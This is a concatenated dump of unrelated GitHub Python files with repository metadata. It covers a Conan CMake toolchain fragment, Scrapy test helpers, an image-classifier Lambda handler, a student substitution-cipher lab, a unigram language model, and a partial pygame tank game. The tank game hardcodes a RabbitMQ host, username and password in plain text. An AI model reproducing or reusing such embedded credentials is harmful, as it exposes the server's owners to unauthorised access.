self._conanfile.settings.get_safe(\"os\")\n os_build = self._conanfile.settings_build.get_safe(\"os\")\n arch_host = self._conanfile.settings.get_safe(\"arch\")\n arch_build = self._conanfile.settings_build.get_safe(\"arch\")\n cmake_system_name_map = {\"Neutrino\": \"QNX\",\n \"\": \"Generic\",\n \"baremetal\": \"Generic\",\n None: \"Generic\"}\n if os_host != os_build:\n return cmake_system_name_map.get(os_host, os_host)\n elif arch_host is not None and arch_host != arch_build:\n if not ((arch_build == \"x86_64\") and (arch_host == \"x86\") or\n (arch_build == \"sparcv9\") and (arch_host == \"sparc\") or\n (arch_build == \"ppc64\") and (arch_host == \"ppc32\")):\n return cmake_system_name_map.get(os_host, os_host)\n\n def _is_apple_cross_building(self):\n os_host = self._conanfile.settings.get_safe(\"os\")\n arch_host = self._conanfile.settings.get_safe(\"arch\")\n arch_build = self._conanfile.settings_build.get_safe(\"arch\")\n os_build = self._conanfile.settings_build.get_safe(\"os\")\n return os_host in ('iOS', 'watchOS', 'tvOS', 'visionOS') or (\n os_host == 'Macos' and (arch_host != arch_build or os_build != os_host))\n\n def _get_cross_build(self):\n user_toolchain = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:user_toolchain\")\n\n system_name = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:system_name\")\n system_version = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:system_version\")\n system_processor = self._conanfile.conf.get(\"tools.cmake.cmaketoolchain:system_processor\")\n\n if not user_toolchain: # try to detect automatically\n os_host = self._conanfile.settings.get_safe(\"os\")\n arch_host = self._conanfile.settings.get_safe(\"arch\")\n if arch_host == \"armv8\":\n arch_host = {\"Windows\": \"ARM64\", \"Macos\": \"arm64\"}.get(os_host, \"aarch64\")\n\n if system_name is None: # Try to deduce\n _system_version = None\n _system_processor = None\n if self._is_apple_cross_building():\n # cross-build in Macos also for M1\n system_name = {'Macos': 'Darwin'}.get(os_host, os_host)\n # CMAKE_SYSTEM_VERSION for Apple sets the sdk version, not the os version\n _system_version = self._conanfile.settings.get_safe(\"os.sdk_version\")\n _system_processor = to_apple_arch(self._conanfile)\n elif os_host != 'Android':\n system_name = self._get_generic_system_name()\n _system_version = self._conanfile.settings.get_safe(\"os.version\")\n _system_processor = arch_host\n\n if system_name is not None and system_version is None:\n system_version = _system_version\n if system_name is not None and system_processor is None:\n system_processor = _system_processor\n\n return system_name, system_version, system_processor\n\n def context(self):\n generator = self._toolchain.generator\n generator_platform = self._get_generator_platform(generator)\n toolset = self._get_toolset(generator)\n system_name, system_version, system_processor = self._get_cross_build()\n\n # This is handled by the tools.apple:sdk_path and CMAKE_OSX_SYSROOT in Apple\n cmake_sysroot = self._conanfile.conf.get(\"tools.build:sysroot\")\n cmake_sysroot = cmake_sysroot.replace(\"\\\\\", \"/\") if cmake_sysroot is not None else None\n\n return {\"toolset\": toolset,\n \"generator_platform\": generator_platform,\n \"cmake_system_name\": system_name,\n \"cmake_system_version\": system_version,\n \"cmake_system_processor\": system_processor,\n \"cmake_sysroot\": cmake_sysroot}\n\n\nclass OutputDirsBlock(Block):\n\n @property\n def template(self):\n if not self._conanfile.package_folder:\n return \"\"\n\n return textwrap.dedent(\"\"\"\n set(CMAKE_INSTALL_PREFIX \"{{package_folder}}\")\n {% if default_bin %}\n set(CMAKE_INSTALL_BINDIR \"{{default_bin}}\")\n set(CMAKE_INSTALL_SBINDIR \"{{default_bin}}\")\n set(CMAKE_INSTALL_LIBEXECDIR \"{{default_bin}}\")\n {% endif %}\n {% if default_lib %}\n set(CMAKE_INSTALL_LIBDIR \"{{default_lib}}\")\n {% endif %}\n {% if default_include %}\n set(CMAKE_INSTALL_INCLUDEDIR \"{{default_include}}\")\n set(CMAKE_INSTALL_OLDINCLUDEDIR \"{{default_include}}\")\n {% endif %}\n {% if default_res %}\n set(CMAKE_INSTALL_DATAROOTDIR \"{{default_res}}\")\n {% endif %}\n \"\"\")\n\n def _get_cpp_info_value(self, name):\n # Why not taking cpp.build? because this variables are used by the \"cmake install\"\n # that correspond to the package folder (even if the root is the build directory)\n elements = getattr(self._conanfile.cpp.package, name)\n return elements[0] if elements else None\n\n def context(self):\n if not self._conanfile.package_folder:\n return {}\n return {\"package_folder\": self._conanfile.package_folder.replace(\"\\\\\", \"/\"),\n \"default_bin\": self._get_cpp_info_value(\"bindirs\"),\n \"default_lib\": self._get_cpp_info_value(\"libdirs\"),\n \"default_include\": self._get_cpp_info_value(\"includedirs\"),\n \"default_res\": self._get_cpp_info_value(\"resdirs\")}\n\n\nclass ToolchainBlocks:\n def __init__(self, conanfile, toolchain, items=None):\n self._blocks = OrderedDict()\n self._conanfile = conanfile\n self._toolchain = toolchain\n if items:\n for name, block in items:\n self._blocks[name] = block(conanfile, toolchain)\n\n def keys(self):\n return self._blocks.keys()\n\n def items(self):\n return self._blocks.items()\n\n def remove(self, name, *args):\n del self._blocks[name]\n for arg in args:\n del self._blocks[arg]\n\n def select(self, name, *args):\n \"\"\"\n keep the blocks provided as arguments, remove the others\n \"\"\"\n to_keep = [name] + list(args)\n self._blocks = OrderedDict((k, v) for k, v in self._blocks.items() if k in to_keep)\n\n def __setitem__(self, name, block_type):\n # Create a new class inheriting Block with the elements of the provided one\n block_type = type('proxyUserBlock', (Block,), dict(block_type.__dict__))\n self._blocks[name] = block_type(self._conanfile, self._toolchain)\n\n def __getitem__(self, name):\n return self._blocks[name]\n\n def process_blocks(self):\n result = []\n for b in self._blocks.values():\n content = b.get_rendered_content()\n if content:\n result.append(content)\n return result\n","repo_name":"conan-io/conan","sub_path":"conan/tools/cmake/toolchain/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":36612,"program_lang":"python","lang":"en","doc_type":"code","stars":7343,"dataset":"github-code","pt":"77"} +{"seq_id":"19449474117","text":"\"\"\"\nThis module contains some assorted functions used in tests\n\"\"\"\n\nimport os\n\nfrom importlib import import_module\nfrom twisted.trial.unittest import SkipTest\n\n\ndef assert_aws_environ():\n \"\"\"Asserts the current environment is suitable for running AWS testsi.\n Raises SkipTest with the reason if it's not.\n \"\"\"\n try:\n import boto\n except ImportError as e:\n raise SkipTest(str(e))\n\n if 'AWS_ACCESS_KEY_ID' not in os.environ:\n raise SkipTest(\"AWS keys not found\")\n\ndef get_crawler(settings_dict=None):\n \"\"\"Return an unconfigured Crawler object. If settings_dict is given, it\n will be used as the settings present in the settings module of the\n CrawlerSettings.\n \"\"\"\n from scrapy.crawler import Crawler\n from scrapy.settings import CrawlerSettings\n\n class SettingsModuleMock(object):\n pass\n settings_module = SettingsModuleMock()\n if settings_dict:\n for k, v in settings_dict.items():\n setattr(settings_module, k, v)\n settings = CrawlerSettings(settings_module)\n return Crawler(settings)\n\ndef get_pythonpath():\n \"\"\"Return a PYTHONPATH suitable to use in processes so that they find this\n installation of Scrapy\"\"\"\n scrapy_path = import_module('scrapy').__path__[0]\n return os.path.dirname(scrapy_path) + os.pathsep + os.environ.get('PYTHONPATH', '')\n\ndef get_testenv():\n \"\"\"Return a OS environment dict suitable to fork processes that need to import\n this installation of Scrapy, instead of a system installed one.\n \"\"\"\n env = os.environ.copy()\n env['PYTHONPATH'] = get_pythonpath()\n return env\n\ndef get_testlog():\n \"\"\"Get Scrapy log of current test, ignoring the rest\"\"\"\n thistest = []\n loglines = open(\"test.log\").readlines()\n for l in loglines[::-1]:\n thistest.append(l)\n if \"[-] -->\" in l:\n break\n return \"\".join(thistest[::-1])\n\n\ndef assert_samelines(testcase, text1, text2, msg=None):\n \"\"\"Asserts text1 and text2 have the same lines, ignoring differences in\n line endings between platforms\n \"\"\"\n testcase.assertEqual(text1.splitlines(), text2.splitlines(), msg)\n","repo_name":"sorig/moodle-scraper","sub_path":"venv/lib/python2.7/site-packages/scrapy/utils/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"42715967371","text":"import io\nfrom torchvision import models\nfrom torch import nn\nimport os\nfrom PIL import Image\nimport json\nimport PIL\nimport requests\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\nimport urllib\nimport time\nimport logging\nimport numpy as np\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nimage_transforms = transforms.Compose([\n transforms.Resize(200),\n transforms.CenterCrop(200),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n])\n\n\n# Load class_to_name json file\ndef load_json(json_file):\n with open(json_file, 'r') as f:\n index_to_name = json.load(f)\n return index_to_name\n\n\ndef flower_model(model_dir):\n model = models.resnet50(pretrained=False)\n checkpoint = torch.load(model_dir, map_location=torch.device('cpu'))\n\n model.class_to_idx = checkpoint['class_to_idx']\n num_classes = checkpoint['output_size']\n model.fc = nn.Sequential(\n nn.Linear(2048, 512),\n nn.ReLU(),\n nn.Dropout(p=0.2),\n nn.Linear(512, num_classes))\n model.load_state_dict(checkpoint['model_state_dict'])\n model = model.eval()\n return model\n\n\ndef prediction(model, image, index_to_name, transforms, topk=5):\n ''' Predict the class (or classes) of an image using a trained deep learning model.\n '''\n image = image.convert('RGB')\n image = transforms(image).unsqueeze(0)\n with torch.no_grad():\n predictions = model(image)\n # Convert softmax output to probabilities\n probabilities = torch.softmax(predictions, dim=1)\n # Probabilities and the indices of those probabilities corresponding to the classes\n top_prob, top_indices = torch.topk(probabilities, k=topk)\n # Convert to lists\n top_indices = top_indices.to('cpu').numpy()\n top_indices = top_indices[0].tolist()\n # Convert topk_indices to the actual class labels using class_to_idx\n # Invert the dictionary so you get a mapping from index to class.\n idx_to_class = {value: key for key, value in model.class_to_idx.items()}\n # print(idx_to_class)\n top_classes = [idx_to_class[index] for index in top_indices]\n # Convert from the class into inference_handler encoding to actual flower names\n result = []\n for i in range(topk):\n pred = {'name': index_to_name[top_classes[i]], 'score': f'{top_prob.cpu().numpy()[0][i]}'}\n result.append(pred)\n return result\n\n\ndef inference_handler(event, context):\n flower_index_to_name = load_json('/home/allen/SnapKnow Deploy/data/flower_to_name.json')\n flower_recog = flower_model(model_dir='/home/allen/SnapKnow Deploy/data/flower_best_model.pth')\n\n url = event[\"body\"][\"url\"]\n image = Image.open(urllib.request.urlopen(url))\n\n flower_response = prediction(flower_recog, image, flower_index_to_name, image_transforms, topk=4)\n\n return json.dumps(flower_response)\n\ndef test(url):\n flower_index_to_name = load_json('/home/allen/SnapKnow Deploy/data/flower_to_name.json')\n flower_recog = flower_model(model_dir='/home/allen/SnapKnow Deploy/data/flower_best_model.pth')\n\n image = Image.open(urllib.request.urlopen(url))\n\n flower_response = prediction(flower_recog, image, flower_index_to_name, image_transforms, topk=4)\n\n return {'Response': flower_response}\n\nurl = 'https://raw.githubusercontent.com/shivajid/Yolo/master/data/eagle.jpg'\nprint(test(url=url))","repo_name":"AllenAkhaumere/snapknow_lambda_functions","sub_path":"flower_deploy/flower_lambda.py","file_name":"flower_lambda.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9363310930","text":"#@author: Sam Chen\n#Lab 1\n\n#Part 1 Bruteforcing\n#whats in a name a rose by any other name would smell as sweet\n#there are two things to a imatin life first to get what you want and a\nimport random\nimport enchant\nimport re\nimport ngram_score\n\ndictionary = enchant.Dict(\"en_US\") #makes dictionary for english\nalphabets = \"abcdefghijklmnopqrstuvwxyz\"\nalphaCAP = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\" \ntransAlphabet = {}\nkey = \"qwertyuiopasdfghjklzxcvbnm\"\n\n#make a dictionary for our alphabets for our encrypt and decrypt \ndef createDict(shift):\n for i in range(0, 26):\n letter = alphabets[i]\n transAlphabet[letter] = alphabets[(i+shift) % 26]\n \n#decrypts the passed in message with message parameter\n#makes an empty string for the ciphertext to go into\n#passes all the possibilities to detect function to find english words\ndef decrypt(message):\n ciphertext = ''\n for letter in message:\n if letter in transAlphabet:\n letter = transAlphabet[letter]\n ciphertext = ciphertext + letter\n else:\n ciphertext = ciphertext + ' '\n #print (\"\\nPrint possibilities: \", ciphertext)\n detect(ciphertext)\n\n#detects first english word from an imported english dictionary and prints out the phrase\ndef detect(decrypted):\n word = decrypted.split(\" \")\n check = dictionary.check(word[0])\n if check:\n print(\"\\nDecrypted bruteforce phrases: \", decrypted)\n return\n\n#Attempt to encrypt part 1 for phrases 3 and 4\ndef encrypt(msg, key, alphabet): #takes in the given phrase and global variable of alphabets\n cipher = \"\"\n upperAlpha = key.upper() #turns the lowercase in the alphabets into uppercase\n for i in msg:\n if i.isalpha(): #when the phrase is alphabetical and is uppercase \n if i.isupper():\n cipher += upperAlpha[alphaCAP.find(i)] #finds the letters in the key and encrypts it\n else:\n cipher += key[alphabets.find(i)] \n else:\n cipher += i \n return cipher\n\n#Part 2 Encrypting and Decrypting a given phrase\n#Encrypts the 3 given messages with a simple substitution cipher\ndef encrypt2(msg, key): #takes in the given phrase and global variable of alphabets\n cipher = \"\"\n upperAlpha = key.upper() #turns the lowercase in the alphabets into uppercase\n for i in msg:\n if i.isalpha(): #when the phrase is alphabetical and is uppercase \n if i.isupper():\n cipher += upperAlpha[alphaCAP.find(i)] #finds the letters in the key and encrypts it\n else:\n cipher += key[alphabets.find(i)] \n else:\n cipher += i \n return cipher\n\n#Decrypts the 3 given phrases with the passed in encryption and a randomly generated key\ndef decryptPart2(cipher, key):\n text = \"\"\n upperAlpha = key.upper()\n for i in cipher:\n if i.isalpha():\n if i.isupper():\n text += alphaCAP[upperAlpha.find(i)]\n else:\n text += alphabets[key.find(i)]\n else:\n text += i\n return text\n\n#Generates a random key to use for part 2 to accomplish the task of encrypting and decrypting the 3 phrases\ndef makeKey():\n randomList = list(alphabets) #turns the string into a list\n random.shuffle(randomList) #shuffles the list\n newKey = (\"\".join(randomList)) #turn list back into a string\n return newKey\n\n#Executes the substitution cipher for part 2\n#Starts by generating a random key then passed the 3 phrases to our Encrypt and Decrypt functions\n#Prints out the results of encryption and decryption\ndef part2():\n start = makeKey()\n e = encrypt2(\"He who fights with monsters should look to it that he himself does not become a monster And if you gaze long into an abyss the abyssal so gazes into you\", start)\n e1 = encrypt2(\"There is a theory which states that if ever anybody discovers exactly what the Universe is for and why it is here it will instantly disappear and be replaced by something even more bizarre and inexplicable There is another theory which states that this has already happened\", start)\n e2 = encrypt2(\"Whenever I find myself growing grim about the mouth whenever it isa damp drizzly November in my soul whenever I find myself involuntarily pausing before coffin warehouses and bringing up therear of every funeral I meet and especially whenever my hypos get such an upper hand of me that it requires a strong moral princip leto prevent me from deliberately stepping into the street and methodically knocking peoples hats off then I account it hightime to get to sea as soon as I can\", start)\n print(\"\\nEncryption1: \", e)\n print(\"\\nEncryption2: \", e1)\n print(\"\\nEncryption3: \", e2)\n d = decryptPart2(e, start)\n d1 = decryptPart2(e1, start)\n d2 = decryptPart2(e2, start)\n print(\"\\nDecryption1: \", d)\n print(\"\\nDecryption2: \", d1)\n print(\"\\nDecryption3: \", d2)\n\n#Begin program\nif __name__ == '__main__':\n \n #activates part 1 bruteforce style\n #creates and starts the dictionary \n #loops throughout the alphabet\n for i in range(0,26):\n createDict(i)\n decrypt(\"fqjcb rwjwj vnjax bnkhj whxcq nawjv nfxdu mbvnu ujbbf nn\")\n decrypt(\"oczmz vmzor jocdi bnojv dhvod igdaz admno ojbzo rcvot jprvi oviyvaozmo cvooj ziejt dojig toczr dnzno jahvi fdiyv xcdzq zoczn zxjiy\")\n\n #activates part 2 for simple substition cipher encryption and decryption\n part2() \n\n #Part 1: Attempts to decrypts phrases 3 and 4\n graham = ngram_score.ngram_score('C:/Users/SamTopSSD/CECS378 Labs/quadgrams.txt') # load our quadgram statistics\n\n mystery='ejitp spawa qleji taiul rtwll rflrl laoat wsqqj atgac kthls iraoatwlpl qjatw jufrh lhuts qataq itats aittk stqfj cae'\n mystery1='iyhqz ewqin azqej shayz niqbe aheum hnmnj jaqii yuexq ayqkn jbeuqiihed yzhni ifnun sayiz yudhe sqshu qesqa iluym qkque aqaqm oejjshqzyu jdzqa diesh niznj jayzy uiqhq vayzq shsnj jejjz nshna hnmytisnae sqfun dqzew qiead zevqi zhnjq shqze udqai jrmtq uishq ifnunsiiqa suoij qqfni syyle iszhn bhmei squih nimnx hsead shqmr udququaqeu iisqe jshnj oihyy snaxs hqihe lsilu ymhni tyz'\n \n masterkey = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n masterscore = -99999\n bigscore,bigkey = masterscore,masterkey[:] #big score copy of master score, big key copy of alphabet\n \n\n i = 0\n while 1:\n i = i+1\n random.shuffle(bigkey)\n deciphered = encrypt(mystery, key, bigkey)\n bigscore = graham.score(deciphered)\n count = 0\n\n\n while count < 999 and count <= 690:\n a = random.randint(0,25)\n b = random.randint(0,25)\n child = bigkey[:]\n # swap two characters in the child\n child[a],child[b] = child[b],child[a]\n str1 = \" \".join(child)\n deciphered = encrypt(mystery, str1, bigkey)\n score = graham.score(deciphered)\n # if the child was better, replace the parent with it\n if score > bigscore:\n bigscore = score\n bigkey = child[:]\n count = 0\n count = count+1\n\n\n # keep track of best score seen so far\n if bigscore > masterscore:\n masterscore,masterkey = bigscore,bigkey[:]\n print('\\nbest score so far:',masterscore,'on iteration', i)\n print('best key: '+''.join(masterkey))\n print('plaintext: '+ deciphered)\n \n\n","repo_name":"abstractprototype/CSULB-Projects","sub_path":"CECS378/CECS378 Labs/CECS378Lab1Submit/SymCrypt.py","file_name":"SymCrypt.py","file_ext":"py","file_size_in_byte":7590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31483006198","text":"import math\nfrom nltk.probability import SimpleGoodTuringProbDist\nfrom nltk.probability import FreqDist\nfrom nltk.util import ngrams\n\n# used for unseen words in training vocabularies\nUNK = None\n# sentence start and end\nSENTENCE_START = \"\"\nSENTENCE_END = \"\"\n\n\nclass UnigramModel:\n def __init__(self, sentences, smoothing=\"AddOne\"):\n self.unigram_frequencies = dict()\n self.corpus_length = 0\n for sentence in sentences:\n unigrams = ngrams(sentence, 1, pad_left=False, pad_right=False)\n for unigram in unigrams:\n self.unigram_frequencies[unigram] = self.unigram_frequencies.get(unigram, 0) + 1\n if unigram != SENTENCE_START and unigram != SENTENCE_END:\n self.corpus_length += 1\n # subtract 2 because unigram_frequencies dictionary contains values for SENTENCE_START and SENTENCE_END\n self.unique_words = len(self.unigram_frequencies) - 2\n self.smoothing = smoothing\n self._unigram_good_turing = SimpleGoodTuringProbDist(freqdist=FreqDist(self.unigram_frequencies))\n\n def calculate_unigram_probability(self, word):\n if self.smoothing == \"GoodTuring\":\n return self._unigram_good_turing.prob(word)\n elif self.smoothing == \"AddOne\":\n word_probability_numerator = self.unigram_frequencies.get(word, 0) + 1\n # add one more to total number of seen unique words for UNK - unseen events\n word_probability_denominator = self.corpus_length + self.unique_words + 1\n return float(word_probability_numerator) / float(word_probability_denominator)\n else:\n try:\n raise ValueError(\"Supported smoothing techniques - 1. AddOne 2. GoodTuring\")\n except ValueError as error:\n print(error.args)\n\n def calculate_sentence_probability(self, sentence):\n sentence_probability_log_sum = 0\n for word in sentence:\n if word != SENTENCE_START and word != SENTENCE_END:\n word_probability = self.calculate_unigram_probability(word)\n sentence_probability_log_sum += math.log(word_probability, 2)\n return sentence_probability_log_sum\n\n def sorted_vocabulary(self):\n full_vocab = list(self.unigram_frequencies.keys())\n full_vocab.sort()\n full_vocab.append(UNK)\n full_vocab.append(SENTENCE_START)\n full_vocab.append(SENTENCE_END)\n return full_vocab\n\n def calculate_number_of_unigrams(self, sentences):\n unigram_count = 0\n for sentence in sentences:\n unigram_count += len(sentence)\n return unigram_count\n\n def calculate_unigram_perplexity(self, sentences):\n unigram_count = self.calculate_number_of_unigrams(sentences)\n sentence_probability_log_sum = 0\n for sentence in sentences:\n try:\n sentence_probability_log_sum -= self.calculate_sentence_probability(sentence)\n except (RuntimeError, ValueError):\n sentence_probability_log_sum -= float('-inf')\n return math.pow(2, sentence_probability_log_sum / unigram_count)","repo_name":"anirban-code-to-live/LanguageModel","sub_path":"src/unigram.py","file_name":"unigram.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8085283978","text":"import requests as rq\r\nimport json\r\n\r\n\r\ndef running(sentence):\r\n sentence = sentence.encode('utf-8')\r\n return rq.post(url, data=sentence).text\r\n\r\n\r\ndef main(data_dir, parsed_data_dir):\r\n with open(data_dir, 'r', encoding='utf-8') as f:\r\n sentences = f.readlines()\r\n\r\n resutls = []\r\n for sentence in sentences:\r\n resutls.append(running(sentence))\r\n\r\n with open(parsed_data_dir, \"w\", encoding='utf-8') as f:\r\n json.dump(resutls, f, indent=4)\r\n\r\n\r\nif __name__ == '__main__':\r\n url = r'http://172.16.133.173:8080/?properties={\"annotators\":\"tokenize, ssplit, pos, lemma\",\"outputFormat\":\"json\", \"pipelineLanguage\":\"en\"}'\r\n data_dir = r''\r\n parsed_data_dir = r''\r\n main(data_dir, parsed_data_dir)\r\n","repo_name":"scofield7419/StruMatchDL","sub_path":"data/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"40057168687","text":"import pygame\r\nimport random\r\nimport time\r\nimport pika\r\nimport json\r\nfrom threading import Thread\r\nfrom enum import Enum\r\nimport uuid\r\nfrom pygame import mixer\r\n\r\npygame.init()\r\n\r\nIP = '34.254.177.17'\r\nPORT = '5672'\r\nVIRTUAL_HOST = 'dar-tanks'\r\nUSERNAME = 'dar-tanks'\r\nPASSWORD = '5orPLExUYnyVYZg48caMpX'\r\n\r\nclass Direction(Enum):\r\n UP = 1\r\n DOWN = 2\r\n LEFT = 3\r\n RIGHT = 4\r\n\r\nwidth = 800\r\nheight = 600\r\nscreen = pygame.display.set_mode((width, height))\r\nboosterIMG=pygame.image.load('img/powerup.png')\r\nwallImage=pygame.image.load('img/brick.png')\r\nshotSound =pygame.mixer.Sound('soundeffects/shot.wav')\r\nexplosionSound =pygame.mixer.Sound('soundeffects/explosion.wav')\r\nfont = pygame.font.SysFont('Courier New', 40)\r\nbont = pygame.font.SysFont('Courier New', 29)\r\n\r\n#duel\r\n\r\nclass Tank:\r\n def __init__(self, tank_id, x, y, speed, color, d_right, d_left, d_up, d_down, d_pull):\r\n self.id = tank_id\r\n self.x = x\r\n self.y = y\r\n self.life = 3\r\n self.speed = 3\r\n self.color = color\r\n self.width = 31\r\n self.direction = Direction.RIGHT\r\n\r\n self.KEY = {d_right: Direction.RIGHT, d_left: Direction.LEFT,\r\n d_up: Direction.UP, d_down: Direction.DOWN}\r\n self.KEYPULL=d_pull\r\n def draw(self):\r\n tank_c = (self.x + int(self.width / 2), self.y + int(self.width / 2))\r\n pygame.draw.rect(screen, self.color, \r\n (self.x, self.y, self.width, self.width), 6)\r\n pygame.draw.circle(screen, self.color, tank_c, int(self.width / 3))\r\n\r\n if self.direction == Direction.RIGHT:\r\n pygame.draw.line(screen, self.color, tank_c, (self.x + self.width + int(self.width / 2), self.y + int(self.width / 2)), 4)\r\n if self.direction == Direction.LEFT:\r\n pygame.draw.line(screen, self.color, tank_c, (\r\n self.x - int(self.width / 2), self.y + int(self.width / 2)), 4)\r\n if self.direction == Direction.UP:\r\n pygame.draw.line(screen, self.color, tank_c, (self.x + int(self.width / 2), self.y - int(self.width / 2)), 4)\r\n if self.direction == Direction.DOWN:\r\n pygame.draw.line(screen, self.color, tank_c, (self.x + int(self.width / 2), self.y + self.width + int(self.width / 2)), 4)\r\n\r\n def change_direction(self, direction):\r\n self.direction = direction\r\n \r\n def move(self):\r\n if self.direction == Direction.LEFT:\r\n self.x -= self.speed\r\n if self.direction == Direction.RIGHT:\r\n self.x += self.speed\r\n if self.direction == Direction.UP:\r\n self.y -= self.speed\r\n if self.direction == Direction.DOWN:\r\n self.y += self.speed\r\n \r\n if self.y <0:\r\n self.y = height\r\n if self.y > height:\r\n self.y = 0\r\n if self.x < 0:\r\n self.x = width\r\n if self.x > width:\r\n self.x = 0\r\n self.draw()\r\n\r\nFPS = 50\r\nclock = pygame.time.Clock()\r\n\r\nclass Shot:\r\n def __init__(self,x=0,y=0,color=(0,0,0),direction=Direction.LEFT,speed=12):\r\n self.x=x\r\n self.y=y\r\n self.color=color\r\n self.speed=speed\r\n self.direction=direction\r\n self.status=True\r\n self.distance=0\r\n self.radius=5\r\n \r\n def move(self):\r\n if self.direction == Direction.LEFT:\r\n self.x -= self.speed\r\n if self.direction == Direction.RIGHT:\r\n self.x += self.speed\r\n if self.direction == Direction.UP:\r\n self.y -= self.speed\r\n if self.direction == Direction.DOWN:\r\n self.y += self.speed\r\n self.distance+=1\r\n if self.distance>(2*width):\r\n self.status=False\r\n self.draw()\r\n\r\n def draw(self):\r\n if self.status:\r\n pygame.draw.circle(screen,self.color,(self.x,self.y),self.radius)\r\n\r\ndef give_coordinates(tank):\r\n if tank.direction == Direction.RIGHT:\r\n x=tank.x + tank.width + int(tank.width / 2)\r\n y=tank.y + int(tank.width / 2)\r\n\r\n if tank.direction == Direction.LEFT:\r\n x=tank.x - int(tank.width / 2)\r\n y=tank.y + int(tank.width / 2)\r\n\r\n if tank.direction == Direction.UP:\r\n x=tank.x + int(tank.width / 2)\r\n y=tank.y - int(tank.width / 2)\r\n\r\n if tank.direction == Direction.DOWN:\r\n x=tank.x + int(tank.width / 2)\r\n y=tank.y + tank.width + int(tank.width / 2)\r\n\r\n p=Shot(x,y,tank.color,tank.direction)\r\n shot.append(p)\r\n\r\nclass Booster:\r\n def __init__(self):\r\n self.x = random.randint(100,800)\r\n self.y = random.randint(100,600)\r\n self.radius = 30\r\n self.status = True\r\n def draw(self):\r\n if self.status: \r\n screen.blit(boosterIMG ,(self.x, self.y))\r\n\r\nclass Wall:\r\n def __init__(self):\r\n self.x = random.randint(100,800)\r\n self.y = random.randint(100,600)\r\n self.width = 10\r\n self.height = 10\r\n self.status = True\r\n\r\n def draw(self):\r\n if self.status:\r\n screen.blit(wallImage,(self.x, self.y))\r\n\r\ndef collision():\r\n for p in shot:\r\n for tank in tanks:\r\n if (tank.x+tank.width+p.radius > p.x > tank.x - p.radius ) and ((tank.y+tank.width + p.radius > p.y > tank.y - p.radius)) and p.status==True:\r\n explosionSound.play()\r\n p.color=(0,0,0)\r\n tank.life -=1\r\n p.status=False\r\n \r\n tank.x=random.randint(50,width-70)\r\n tank.y=random.randint(50,height-70)\r\n\r\ndef life():\r\n life1=tanks[1].life\r\n life2=tanks[0].life\r\n res = bont.render(\"1's Player's Life: \" + str(life1), True, (255, 123, 100))\r\n res1 = bont.render(\"2's Player's Life: \" + str(life2), True, (100, 230, 40))\r\n screen.blit(res, (40,70))\r\n screen.blit(res1, (420,70))\r\n\r\ntank1 = Tank(1, 50, 50, 3, (240, 240, 0), pygame.K_d, pygame.K_a, pygame.K_w, pygame.K_s, pygame.K_SPACE)\r\ntank2 = Tank(2, 700, 500 ,3, (200, 0, 200), pygame.K_RIGHT, pygame.K_LEFT, pygame.K_UP, pygame.K_DOWN, pygame.K_RETURN)\r\n\r\nmap= [Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall(),Wall()]\r\ntanks = [tank1, tank2]\r\nshot = []\r\nbooster0 = Booster()\r\nboosters = [booster0]\r\n\r\ndef mainpage():\r\n wallpaper = pygame.image.load('img/wallpaper.png')\r\n screen = pygame.display.set_mode((width, height))\r\n pygame.display.set_caption(\"Choose Your Hero!\")\r\n screen.blit(wallpaper, (0, 0))\r\n screen.blit(font.render(\"press Enter to play duel \", 1, (255,255,255)), font.render(\"press Enter to play duel \", 1, (0,0,0)).get_rect(center = (420,200)))\r\n screen.blit(font.render(\"press Space to play multiplayer \", 1, (255,255,255)), font.render(\"press Space to play 1 vs server players \", 1, (0,0,0)).get_rect(center = (500,300)))\r\n screen.blit(font.render(\"press Ctrl to play AI mode\", 1, (255,255,255)), font.render(\"press Ctrl to watch AI mode \", 1, (0,0,0)).get_rect(center = (450,400)))\r\n screen.blit(font.render(\"press Esc to quit\", 1, (255,255,255)), font.render(\"press Esc to watch quit \", 1, (0,0,0)).get_rect(center = (470,500)))\r\n pygame.display.flip()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit() \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE: \r\n quit() \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_RETURN:\r\n duel()\r\n if event.key == pygame.K_SPACE:\r\n multiplayer()\r\n if event.key == pygame.K_LCTRL:\r\n AImode()\r\n\r\ndef duel():\r\n start_time = None\r\n clock = pygame.time.Clock()\r\n font = pygame.font.SysFont('Courier New', 40)\r\n mainloop = True\r\n lifely = True\r\n time1 = 0\r\n time2 = 0\r\n timer1 = False\r\n timer2 = False\r\n while mainloop:\r\n mills = clock.tick(FPS)\r\n if lifely:\r\n start_time = pygame.time.get_ticks()\r\n screen = pygame.display.set_mode((width, height))\r\n pygame.display.set_caption(\"DUEL\")\r\n screen.fill((127,255,212))\r\n background = pygame.Surface((200,700))\r\n screen.blit(background,(800,0))\r\n life()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit() \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n quit()\r\n pressed = pygame.key.get_pressed()\r\n start_time = pygame.time.get_ticks()\r\n for tank in tanks:\r\n if event.key in tank.KEY.keys():\r\n 